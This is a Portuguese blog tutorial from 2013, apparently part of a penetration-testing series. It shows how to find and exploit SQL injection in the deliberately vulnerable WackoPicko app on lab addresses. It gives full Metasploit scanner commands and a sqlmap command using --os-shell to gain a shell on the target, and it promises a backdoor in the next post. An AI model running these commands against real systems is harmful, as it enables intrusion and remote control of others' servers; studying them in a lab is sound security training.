sexta-feira, 17 de maio de 2013

Seguindo pessoal com o paper, nesse post vamos ver alguns ataques que podemos fazer ao site com e sem o Metasploit.


SQL Injection com Metasploit


Se você quer testar se um parâmetro tem alguma vulnerabilidade de SQL Injection ou não, também podemos testar com o Metasploit. Usarei o módulo auxiliary/scanner/http/blind_qsl_query para este teste.

1. Depois do scan com o plugin WMAP, descobrimos que a url http://10.12.0.2/WackoPicko/website/users/login.php tem uma vulnerabilidade de SQL Injection e tem 2 parâmetros: username e password. Agora vamos testar esse parâmetro com o móduloauxiliary/scanner/http/blind_sql_query module.


msf > use auxiliary/scanner/http/blind_sql_query
msf auxiliary(blind_sql_query) > show options


2.Especifique o ambiente da página alvo.

msf auxiliary(blind_sql_query) > set DATA username=hacker&password=password&submit=login
msf auxiliary(blind_sql_query) > set METHOD POST


msf auxiliary(blind_sql_query) > set PATH /WackoPicko/users/login.php
msf auxiliary(blind_sql_query) > set RHOSTS 192.168.77.138

3. Inicie o teste.


msf auxiliary(blind_sql_query) > run







O resultado é que o parâmetro “username” está mesmo vulnerável a SQL Injection. Temos também outro módulo, que usa a técnica "Error Based" no diretório auxiliary/scanner/http/error_sql_injection.

Já que temos uma vulnerabilidade no parâmetro “username” em users/login.php, podemos usar essa vulnerabilidade para invadir o site com uma tool fora do Metasploit, o SQLMap. O SQLMap é muito famoso e funciona muito bem com o Metasploit.

1. Usaremos 3 flags do sqlmap para este ataque:

-u URL URL do alvo
-data=DATA String que será mandada através do POST
-random-agent Usar "user agent" aleatóriamente
--os-shell Receber o shell do alvo como resposta da requisição

2. Agora, vamos rodar o sqlmap com os detalhes que temos. Após o comando, se o usuário usado nessa aplicação tiver privilégios suficientes, você receberá a shell.


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.77.138/WackoPicko/users/login.php" --data "username=hacker&password=password&submit=login" --os-shell




E ai está!

Se tudo deu certo, nesse ponto temos a shell do alvo. Paramos por aqui e no próximo post vamos ver como criar um backdoor com o Metasploit para facilitar nosso trabalho de voltar a shell da vítima quando necessário.

0 comentários:

Postar um comentário

Subscribe to RSS Feed Follow me on Twitter!